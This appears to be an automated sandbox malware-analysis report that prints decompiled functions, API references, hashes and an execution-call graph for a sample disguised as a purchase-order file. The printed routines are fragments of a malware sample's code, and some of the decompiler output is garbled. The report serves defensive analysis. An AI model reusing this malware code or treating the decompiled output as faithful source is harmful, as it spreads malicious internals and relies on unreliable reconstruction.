                                                                                            • Opcode ID: 04d6558dea2fa0bacb06b508c832465add97f0068882ee2754069652d2733816
                                                                                            • Instruction ID: 353fccd347e31793cac348406ec5d1dda16fbd14f99b9de6a531937be081159c
                                                                                            • Opcode Fuzzy Hash: 04d6558dea2fa0bacb06b508c832465add97f0068882ee2754069652d2733816
                                                                                            • Instruction Fuzzy Hash: 261155B5214104AFDB00DF59CC81CE77BA8EF49320F18865EFC9D87202C634E851CBA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00418D80 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 128 418d80-418db1 call 419700 RtlAllocateHeap
                                                                                            C-Code - Quality: 100%
                                                                                            			E00418D80(intOrPtr _a4, void* _a8, long _a12, char _a16) {
				void* _t10;

				E00419700( *((intOrPtr*)(_a4 + 0x14)), _a4, _t7 + 0xc78,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x34);
				_t4 =  &_a16; // 0x41412f
				_t10 = RtlAllocateHeap(_a8, _a12,  *_t4); // executed
				return _t10;
			}




                                                                                            0x00418d97
                                                                                            0x00418d9c
                                                                                            0x00418dad
                                                                                            0x00418db1

                                                                                            APIs
                                                                                            • RtlAllocateHeap.NTDLL(004139B6,?,/AA,0041412F,?,004139B6,?,?,?,?,?,00000000,00408F43,?), ref: 00418DAD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.544490166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_400000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocateHeap
                                                                                            • String ID: /AA
                                                                                            • API String ID: 1279760036-619304845
                                                                                            • Opcode ID: 3475e4ce147188984917274b23a3ce64a2d51b7d96393a60bc76b0d7bf074b16
                                                                                            • Instruction ID: 3ce4712d63a825713472f4f22c312be3b431b1c6076f52d3c182b7c21b3038ff
                                                                                            • Opcode Fuzzy Hash: 3475e4ce147188984917274b23a3ce64a2d51b7d96393a60bc76b0d7bf074b16
                                                                                            • Instruction Fuzzy Hash: E5E012B5210208ABDB14EF99DC45EE737ADAF88664F018159FA185B282CA30F914CAB0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00407629 Relevance: 1.6, APIs: 1, Instructions: 66threadwindowCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 219 407629-40762a 220 4075f5-4075f8 219->220 221 40762c-40762d 219->221 222 4075fa-4075fc 220->222 223 4075ae-4075be call 41a6a0 220->223 224 4075c4-4075c5 221->224 225 40762f-40767a call 41a720 call 41b300 call 409f70 call 4142d0 221->225 237 40767c-40768e PostThreadMessageW 225->237 238 4076ae-4076b2 225->238 239 407690-4076aa call 4096d0 237->239 240 4076ad 237->240 239->240 240->238
                                                                                            C-Code - Quality: 46%
                                                                                            			E00407629(void* __eflags, long _a8) {
				char _v63;
				char _v64;
				long __edi;
				int __esi;
				void* _t11;
				void* _t14;
				void* _t18;

				if(__eflags <= 0) {
					asm("sbb al, 0xfc");
					_t19 = _t18 + 1;
					__eflags = _t18 + 1;
					if(_t18 + 1 < 0) {
						E0041A6A0();
						return 0;
					} else {
						asm("invalid");
						_t14 = E0041A0A0(_t11, _t19, 0x11c6f95e);
						return E00419F50(_t19) + _t14 + 0x1000;
					}
				} else {
					asm("outsb");
					asm("loope 0xffffff97");
					__ebp = 0x83ec8b55;
					_push(0x83ec8b55);
					__ebp = __esp;
					__esp = __esp - 0x40;
					_push(__esi);
					_t3 =  &_v63; // 0x83ec8b16
					__eax = _t3;
					_v64 = 0;
					__eax = E0041A720(_t3, 0, 0x3f);
					_t5 =  &_v64; // 0x83ec8b15
					__ecx = _t5;
					__eax = E0041B300(_t5, 3);
					__esi = _a8;
					_t7 =  &_v64; // 0x83ec8b15
					__esi = _a8 + 0x20;
					__eax = E00409F70(__eflags, _a8 + 0x20, _t7); // executed
					__eax = E004142D0(__ecx, _a8 + 0x20, __eax, 0, 0, 0xc4e7b6d6);
					__esi = __eax;
					__eflags = __esi;
					if(__esi != 0) {
						_push(__edi);
						__edi = _a8;
						__eax = PostThreadMessageW(__edi, 0x111, 0, 0); // executed
						__eflags = __eax;
						if(__eflags == 0) {
							__eax = E004096D0(__eflags, 1, 8);
							_t10 = (__al & 0x000000ff) - 0x40; // 0x83ec8b15
							__ecx = __ebp + _t10;
							__eax =  *__esi(__edi, 0x8003, __ebp + _t10, __eax);
						}
						_pop(__edi);
					}
					_pop(__esi);
					__esp = __ebp;
					_pop(__ebp);
					return __eax;
				}
			}










                                                                                            0x0040762a
                                                                                            0x004075f5
                                                                                            0x004075f7
                                                                                            0x004075f7
                                                                                            0x004075f8
                                                                                            0x004075ae
                                                                                            0x004075be
                                                                                            0x004075fa
                                                                                            0x004075fa
                                                                                            0x00407606
                                                                                            0x0040761d
                                                                                            0x0040761d
                                                                                            0x0040762c
                                                                                            0x0040762c
                                                                                            0x0040762d
                                                                                            0x0040762f
                                                                                            0x00407630
                                                                                            0x00407631
                                                                                            0x00407633
                                                                                            0x00407636
                                                                                            0x00407639
                                                                                            0x00407639
                                                                                            0x0040763f
                                                                                            0x00407643
                                                                                            0x00407648
                                                                                            0x00407648
                                                                                            0x0040764e
                                                                                            0x00407653
                                                                                            0x00407656
                                                                                            0x0040765a
                                                                                            0x0040765e
                                                                                            0x0040766e
                                                                                            0x00407673
                                                                                            0x00407678
                                                                                            0x0040767a
                                                                                            0x0040767c
                                                                                            0x0040767d
                                                                                            0x0040768a
                                                                                            0x0040768c
                                                                                            0x0040768e
                                                                                            0x00407695
                                                                                            0x004076a0
                                                                                            0x004076a0
                                                                                            0x004076ab
                                                                                            0x004076ab
                                                                                            0x004076ad
                                                                                            0x004076ad
                                                                                            0x004076ae
                                                                                            0x004076af
                                                                                            0x004076b1
                                                                                            0x004076b2
                                                                                            0x004076b2

                                                                                            APIs
                                                                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040768A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.544490166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_400000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: MessagePostThread
                                                                                            • String ID:
                                                                                            • API String ID: 1836367815-0
                                                                                            • Opcode ID: bd8fc6456d05cc08e3e484afbca47ed5431c5357cef41c43edc71c40475ed825
                                                                                            • Instruction ID: 0391cfbc88caf94892ae891e4054be77c26fe76d28bdabc601f68bb7d407126f
                                                                                            • Opcode Fuzzy Hash: bd8fc6456d05cc08e3e484afbca47ed5431c5357cef41c43edc71c40475ed825
                                                                                            • Instruction Fuzzy Hash: 74110831A402197AE72096948C03FFE77189B44B54F14042EFB04FA2C2E6AD7E0747A9
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00407630 Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 243 407630-40763f 244 407648-40767a call 41b300 call 409f70 call 4142d0 243->244 245 407643 call 41a720 243->245 252 40767c-40768e PostThreadMessageW 244->252 253 4076ae-4076b2 244->253 245->244 254 407690-4076aa call 4096d0 252->254 255 4076ad 252->255 254->255 255->253
                                                                                            C-Code - Quality: 82%
                                                                                            			E00407630(intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t1 =  &_v67; // 0x83ec8b16
				_v68 = 0;
				E0041A720(_t1, 0, 0x3f);
				_t3 =  &_v68; // 0x83ec8b15
				E0041B300(_t3, 3);
				_t5 =  &_v68; // 0x83ec8b15
				_t12 = E00409F70(_t30, _a4 + 0x20, _t5); // executed
				_t13 = E004142D0(_t3, _a4 + 0x20, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t8 = (E004096D0(_t32, 1, 8) & 0x000000ff) - 0x40; // 0x83ec8b15
						_t14 =  *_t25(_t21, 0x8003, _t26 + _t8, _t14);
					}
					return _t14;
				}
				return _t13;
			}












                                                                                            0x00407639
                                                                                            0x0040763f
                                                                                            0x00407643
                                                                                            0x00407648
                                                                                            0x0040764e
                                                                                            0x00407656
                                                                                            0x0040765e
                                                                                            0x0040766e
                                                                                            0x00407673
                                                                                            0x0040767a
                                                                                            0x0040767d
                                                                                            0x0040768a
                                                                                            0x0040768c
                                                                                            0x0040768e
                                                                                            0x004076a0
                                                                                            0x004076ab
                                                                                            0x004076ab
                                                                                            0x00000000
                                                                                            0x004076ad
                                                                                            0x004076b2

                                                                                            APIs
                                                                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040768A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.544490166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_400000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: MessagePostThread
                                                                                            • String ID:
                                                                                            • API String ID: 1836367815-0
                                                                                            • Opcode ID: 84b15edaa294b34923a287f7395c5b0c7ce486137542d4536ac6b9a8eb19a39a
                                                                                            • Instruction ID: a136aea8e73414db159388e9070755cc2605e6a50b49d7e88f5267c317adf1d1
                                                                                            • Opcode Fuzzy Hash: 84b15edaa294b34923a287f7395c5b0c7ce486137542d4536ac6b9a8eb19a39a
                                                                                            • Instruction Fuzzy Hash: EC01D831A4021876E720A6958C03FFE772C5B00B54F04001AFF04BA1C1E6A9790646EA
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00418DB3 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 285 418db3-418e28 call 419700 ExitProcess
                                                                                            C-Code - Quality: 31%
                                                                                            			E00418DB3() {
				int _v0;
				void* _v1;
				intOrPtr _v4;
				void* _t7;
				signed int _t15;
				signed int _t16;
				void* _t18;
				signed int _t22;

				_t16 = _t15 |  *(_t7 + _t18);
				asm("std");
				asm("hlt");
				_push(cs);
				asm("fisubr dword [edx+ecx*2]");
				_t22 =  &_v1 &  *(_t16 - 0x70a9831);
				asm("fldcw word [esi-0x741374ab]");
				_push(_t22);
				_t9 = _v4;
				E00419700( *((intOrPtr*)(_v4 + 0xa18)), _t9, _t9 + 0xc84,  *((intOrPtr*)(_v4 + 0xa18)), 0, 0x36);
				ExitProcess(_v0);
			}











                                                                                            0x00418db5
                                                                                            0x00418db8
                                                                                            0x00418dba
                                                                                            0x00418df4
                                                                                            0x00418df5
                                                                                            0x00418df8
                                                                                            0x00418dfe
                                                                                            0x00418e00
                                                                                            0x00418e03
                                                                                            0x00418e1a
                                                                                            0x00418e28

                                                                                            APIs
                                                                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418E28
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.544490166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_400000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ExitProcess
                                                                                            • String ID:
                                                                                            • API String ID: 621844428-0
                                                                                            • Opcode ID: db552e14f202af22712bd1fd330bade77233ffec33b66d63c146a6e021001cb7
                                                                                            • Instruction ID: 6447a13a17c000712bb8a37dc7370de49cab37a5c4e2b574e9a8726c50ec24f0
                                                                                            • Opcode Fuzzy Hash: db552e14f202af22712bd1fd330bade77233ffec33b66d63c146a6e021001cb7
                                                                                            • Instruction Fuzzy Hash: F9E02274018608AFDB11AB14CC81D877BA0EF02B10F05479CE4E81F007CA35AA22CB94
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00418DC0 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 289 418dc0-418df1 call 419700 RtlFreeHeap
                                                                                            C-Code - Quality: 100%
                                                                                            			E00418DC0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;

				_t3 = _a4 + 0xc7c; // 0xc7c
				E00419700( *((intOrPtr*)(_a4 + 0x14)), _t7, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}




                                                                                            0x00418dcf
                                                                                            0x00418dd7
                                                                                            0x00418ded
                                                                                            0x00418df1

                                                                                            APIs
                                                                                            • RtlFreeHeap.NTDLL(00000060,00408F43,?,?,00408F43,00000060,00000000,00000000,?,?,00408F43,?,00000000), ref: 00418DED
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.544490166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_400000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: FreeHeap
                                                                                            • String ID:
                                                                                            • API String ID: 3298025750-0
                                                                                            • Opcode ID: 4e30e59f8a7cae1eea1a44fc2eb512081b274e14a77e40b60adbf75a3d3a8219
                                                                                            • Instruction ID: 70852f986b88bd22bba351ddd047dfa98c23c8b1edf630760962ab5a7e0eeca2
                                                                                            • Opcode Fuzzy Hash: 4e30e59f8a7cae1eea1a44fc2eb512081b274e14a77e40b60adbf75a3d3a8219
                                                                                            • Instruction Fuzzy Hash: 74E01AB5210204ABD714DF99DC45E9737ADAF88750F018159F91857241C530E910CAB0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00418F20 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E00418F20(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;

				E00419700( *((intOrPtr*)(_a4 + 0xa1c)), _a4, _t7 + 0xc94,  *((intOrPtr*)(_a4 + 0xa1c)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}




                                                                                            0x00418f3a
                                                                                            0x00418f50
                                                                                            0x00418f54

                                                                                            APIs
                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040D3F2,0040D3F2,00000041,00000000,?,00408FB5), ref: 00418F50
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.544490166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_400000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: LookupPrivilegeValue
                                                                                            • String ID:
                                                                                            • API String ID: 3899507212-0
                                                                                            • Opcode ID: 773a9d1d4718297720046bce545899814da927c5dee80faf5a466a74b6c9604b
                                                                                            • Instruction ID: ecbe9d4e3f583988c1c827a8b5eb191ae685218fb2d7aa99a9dbd1465323ab75
                                                                                            • Opcode Fuzzy Hash: 773a9d1d4718297720046bce545899814da927c5dee80faf5a466a74b6c9604b
                                                                                            • Instruction Fuzzy Hash: 75E01AB5210208ABD714DF99CC45EE737ADAF89760F018155FA0C57241C530E811CAB5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00418DBE Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 79%
                                                                                            			E00418DBE(void* __eax, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _v1;
				char _t12;

				_push( &_v1);
				_t9 = _a4;
				_t3 = _t9 + 0xc7c; // 0xc7c
				E00419700( *((intOrPtr*)(_a4 + 0x14)), _t9, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x35);
				_t12 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t12;
			}





                                                                                            0x00418dc0
                                                                                            0x00418dc3
                                                                                            0x00418dcf
                                                                                            0x00418dd7
                                                                                            0x00418ded
                                                                                            0x00418df1

                                                                                            APIs
                                                                                            • RtlFreeHeap.NTDLL(00000060,00408F43,?,?,00408F43,00000060,00000000,00000000,?,?,00408F43,?,00000000), ref: 00418DED
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.544490166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_400000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: FreeHeap
                                                                                            • String ID:
                                                                                            • API String ID: 3298025750-0
                                                                                            • Opcode ID: d39915d30231c88c02befcc7989e40e4419f3e63c37b813ae00a4e13ec57a1b3
                                                                                            • Instruction ID: d56a0894eff1da85dba6ffdcc7a2d7567c0b3422cbbfd1398c4b6c9530869ea3
                                                                                            • Opcode Fuzzy Hash: d39915d30231c88c02befcc7989e40e4419f3e63c37b813ae00a4e13ec57a1b3
                                                                                            • Instruction Fuzzy Hash: BCE0C2B81242495BDB10EFA9D8908AB77D5FF853147118A4AE85887703C234D85ACBB1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00418E00 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E00418E00(intOrPtr _a4, int _a8) {

				_t5 = _a4;
				E00419700( *((intOrPtr*)(_a4 + 0xa18)), _t5, _t5 + 0xc84,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x36);
				ExitProcess(_a8);
			}



                                                                                            0x00418e03
                                                                                            0x00418e1a
                                                                                            0x00418e28

                                                                                            APIs
                                                                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418E28
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.544490166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_400000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ExitProcess
                                                                                            • String ID:
                                                                                            • API String ID: 621844428-0
                                                                                            • Opcode ID: f534823884a614df79104f3219a800c5f567eb79e9528ffb644fd058e25bc354
                                                                                            • Instruction ID: 8a2151c9915900c5a50a6b6facd23392ca56ec41274e49eba0b8d6d2dd10ecc1
                                                                                            • Opcode Fuzzy Hash: f534823884a614df79104f3219a800c5f567eb79e9528ffb644fd058e25bc354
                                                                                            • Instruction Fuzzy Hash: E3D01776610218BBDA24EF99CC85FD777ACDF456A0F0580A5FA1C6B282C934BA00C7E4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Non-executed Functions

                                                                                            Function 00415B3E Relevance: .0, Instructions: 17COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.544490166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_400000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: cf5016a01af15f382769292de5662a1c779951c037434570365bcbf58a9bda21
                                                                                            • Instruction ID: 22407d329ac03560312ad28e89e7483ece2a5605153795ef05de3880859a8d23
                                                                                            • Opcode Fuzzy Hash: cf5016a01af15f382769292de5662a1c779951c037434570365bcbf58a9bda21
                                                                                            • Instruction Fuzzy Hash: 2BC08C23BAA5280500160C0AAC901F4F395E296920B10F666C808EF500CA06C11600CC
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Execution Graph

                                                                                            Execution Coverage:5.3%
                                                                                            Dynamic/Decrypted Code Coverage:2%
                                                                                            Signature Coverage:0%
                                                                                            Total number of Nodes:707
                                                                                            Total number of Limit Nodes:85
                                                                                            execution_graph 29167 4619540 LdrInitializeThunk 29169 25cd9ed 29172 25ca200 29169->29172 29173 25ca226 29172->29173 29180 25b8f90 29173->29180 29175 25ca232 29176 25ca256 29175->29176 29188 25b8280 29175->29188 29220 25c8e00 29176->29220 29223 25b8ee0 29180->29223 29182 25b8f9d 29183 25b8fa4 29182->29183 29235 25b8e80 29182->29235 29183->29175 29189 25b82a7 29188->29189 29656 25ba440 29189->29656 29191 25b82b9 29660 25ba190 29191->29660 29193 25b82d6 29201 25b82dd 29193->29201 29713 25ba0c0 LdrLoadDll 29193->29713 29195 25b8424 29195->29176 29197 25b8346 29197->29195 29198 25ca850 2 API calls 29197->29198 29199 25b835c 29198->29199 29200 25ca850 2 API calls 29199->29200 29202 25b836d 29200->29202 29201->29195 29664 25bd5a0 29201->29664 29203 25ca850 2 API calls 29202->29203 29204 25b837e 29203->29204 29676 25bb300 29204->29676 29206 25b8391 29207 25c3ed0 8 API calls 29206->29207 29208 25b83a2 29207->29208 29209 25c3ed0 8 API calls 29208->29209 29210 25b83b3 29209->29210 29211 25b83d3 29210->29211 29688 25bbe70 29210->29688 29212 25c3ed0 8 API calls 29211->29212 29215 25b841b 29211->29215 29218 25b83ea 29212->29218 29694 25b8060 29215->29694 29218->29215 29715 25bbf10 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 29218->29715 29221 25c9700 LdrLoadDll 29220->29221 29222 25c8e1f 29221->29222 29254 25c7320 29223->29254 29227 25b8f06 29227->29182 29228 25b8efc 29228->29227 29261 25c9ab0 29228->29261 29230 25b8f43 29230->29227 29272 25b8d10 29230->29272 29232 25b8f63 29278 25b8760 LdrLoadDll 29232->29278 29234 25b8f75 29234->29182 29236 25b8e9a 29235->29236 29237 25c9da0 LdrLoadDll 29235->29237 29630 25c9da0 29236->29630 29237->29236 29240 25c9da0 LdrLoadDll 29241 25b8ec1 29240->29241 29242 25bd3a0 29241->29242 29243 25bd3b9 29242->29243 29638 25ba2c0 29243->29638 29245 25bd3cc 29642 25c8930 29245->29642 29249 25bd3f2 29250 25bd41d 29249->29250 29648 25c89b0 29249->29648 29252 25c8be0 2 API calls 29250->29252 29253 25b8fb5 29252->29253 29253->29175 29255 25c732f 29254->29255 29279 25c42d0 29255->29279 29257 25b8ef3 29258 25c71d0 29257->29258 29285 25c8d50 29258->29285 29262 25c9ac9 29261->29262 29292 25c3ed0 29262->29292 29264 25c9ae1 29265 25c9aea 29264->29265 29331 25c98f0 29264->29331 29265->29230 29267 25c9afe 29267->29265 29348 25c8650 29267->29348 29608 25b71c0 29272->29608 29274 25b8d31 29274->29232 29275 25b8d2a 29275->29274 29621 25b7480 29275->29621 29278->29234 29280 25c42de 29279->29280 29281 25c42ea 29279->29281 29280->29281 29284 25c4750 LdrLoadDll 29280->29284 29281->29257 29283 25c443c 29283->29257 29284->29283 29288 25c9700 29285->29288 29287 25c71e5 29287->29228 29289 25c970f 29288->29289 29291 25c9785 29288->29291 29290 25c42d0 LdrLoadDll 29289->29290 29289->29291 29290->29291 29291->29287 29293 25c4205 29292->29293 29294 25c3ee4 29292->29294 29293->29264 29294->29293 29356 25c83a0 29294->29356 29297 25c4010 29359 25c8ab0 29297->29359 29298 25c3ff3 29417 25c8bb0 LdrLoadDll 29298->29417 29301 25c3ffd 29301->29264 29302 25c4037 29303 25ca680 2 API calls 29302->29303 29306 25c4043 29303->29306 29304 25c41c9 29307 25c8be0 2 API calls 29304->29307 29305 25c41df 29426 25c3c10 LdrLoadDll NtReadFile NtClose 29305->29426 29306->29301 29306->29304 29306->29305 29311 25c40d2 29306->29311 29308 25c41d0 29307->29308 29308->29264 29310 25c41f2 29310->29264 29312 25c4139 29311->29312 29314 25c40e1 29311->29314 29312->29304 29313 25c414c 29312->29313 29419 25c8a30 29313->29419 29316 25c40fa 29314->29316 29317 25c40e6 29314->29317 29320 25c40ff 29316->29320 29321 25c4117 29316->29321 29418 25c3ad0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 29317->29418 29363 25c3b70 29320->29363 29321->29308 29375 25c3890 29321->29375 29323 25c40f0 29323->29264 29325 25c41ac 29423 25c8be0 29325->29423 29326 25c410d 29326->29264 29329 25c412f 29329->29264 29330 25c41b8 29330->29264 29332 25c990b 29331->29332 29333 25c991d 29332->29333 29446 25ca600 29332->29446 29333->29267 29335 25c993d 29449 25c34f0 29335->29449 29337 25c9960 29337->29333 29338 25c34f0 3 API calls 29337->29338 29339 25c9982 29338->29339 29339->29333 29481 25c4810 29339->29481 29341 25c9a0a 29342 25c9a1a 29341->29342 29576 25c9680 LdrLoadDll 29341->29576 29492 25c94f0 29342->29492 29345 25c9a48 29571 25c8610 29345->29571 29349 25c9700 LdrLoadDll 29348->29349 29350 25c866c 29349->29350 29602 461967a 29350->29602 29351 25c8687 29353 25ca680 29351->29353 29354 25c9b59 29353->29354 29605 25c8dc0 29353->29605 29354->29230 29357 25c9700 LdrLoadDll 29356->29357 29358 25c3fc4 29357->29358 29358->29297 29358->29298 29358->29301 29360 25c8ac6 29359->29360 29361 25c9700 LdrLoadDll 29360->29361 29362 25c8acc NtCreateFile 29361->29362 29362->29302 29364 25c3b8c 29363->29364 29365 25c8a30 LdrLoadDll 29364->29365 29366 25c3bad 29365->29366 29367 25c3bc8 29366->29367 29368 25c3bb4 29366->29368 29370 25c8be0 2 API calls 29367->29370 29369 25c8be0 2 API calls 29368->29369 29371 25c3bbd 29369->29371 29372 25c3bd1 29370->29372 29371->29326 29427 25ca890 29372->29427 29374 25c3bdc 29374->29326 29376 25c390e 29375->29376 29377 25c38db 29375->29377 29378 25c3a59 29376->29378 29381 25c392a 29376->29381 29379 25c8a30 LdrLoadDll 29377->29379 29380 25c8a30 LdrLoadDll 29378->29380 29382 25c38f6 29379->29382 29387 25c3a74 29380->29387 29383 25c8a30 LdrLoadDll 29381->29383 29384 25c8be0 2 API calls 29382->29384 29386 25c3945 29383->29386 29385 25c38ff 29384->29385 29385->29329 29389 25c394c 29386->29389 29390 25c3961 29386->29390 29445 25c8a70 LdrLoadDll 29387->29445 29392 25c8be0 2 API calls 29389->29392 29393 25c397c 29390->29393 29394 25c3966 29390->29394 29391 25c3aae 29395 25c8be0 2 API calls 29391->29395 29396 25c3955 29392->29396 29403 25c3981 29393->29403 29433 25ca850 29393->29433 29397 25c8be0 2 API calls 29394->29397 29399 25c3ab9 29395->29399 29396->29329 29400 25c396f 29397->29400 29398 25c3993 29398->29329 29399->29329 29400->29329 29403->29398 29436 25c8b60 29403->29436 29404 25c39e7 29410 25c39fe 29404->29410 29444 25c89f0 LdrLoadDll 29404->29444 29406 25c3a1a 29409 25c8be0 2 API calls 29406->29409 29407 25c3a05 29408 25c8be0 2 API calls 29407->29408 29408->29398 29411 25c3a23 29409->29411 29410->29406 29410->29407 29412 25c3a4f 29411->29412 29439 25ca450 29411->29439 29412->29329 29414 25c3a3a 29415 25ca680 2 API calls 29414->29415 29416 25c3a43 29415->29416 29416->29329 29417->29301 29418->29323 29420 25c9700 LdrLoadDll 29419->29420 29421 25c4194 29420->29421 29422 25c8a70 LdrLoadDll 29421->29422 29422->29325 29424 25c8bfc NtClose 29423->29424 29425 25c9700 LdrLoadDll 29423->29425 29424->29330 29425->29424 29426->29310 29430 25c8d80 29427->29430 29429 25ca8aa 29429->29374 29431 25c9700 LdrLoadDll 29430->29431 29432 25c8d9c RtlAllocateHeap 29431->29432 29432->29429 29434 25c8d80 2 API calls 29433->29434 29435 25ca868 29434->29435 29435->29403 29437 25c8b7c NtReadFile 29436->29437 29438 25c9700 LdrLoadDll 29436->29438 29437->29404 29438->29437 29440 25ca45d 29439->29440 29441 25ca474 29439->29441 29440->29441 29442 25ca850 2 API calls 29440->29442 29441->29414 29443 25ca48b 29442->29443 29443->29414 29444->29410 29445->29391 29577 25c8c90 29446->29577 29448 25ca62d 29448->29335 29450 25c3501 29449->29450 29451 25c3509 29449->29451 29450->29337 29480 25c37dc 29451->29480 29580 25cb830 29451->29580 29453 25c355d 29454 25cb830 2 API calls 29453->29454 29458 25c3568 29454->29458 29455 25c35b6 29457 25cb830 2 API calls 29455->29457 29461 25c35ca 29457->29461 29458->29455 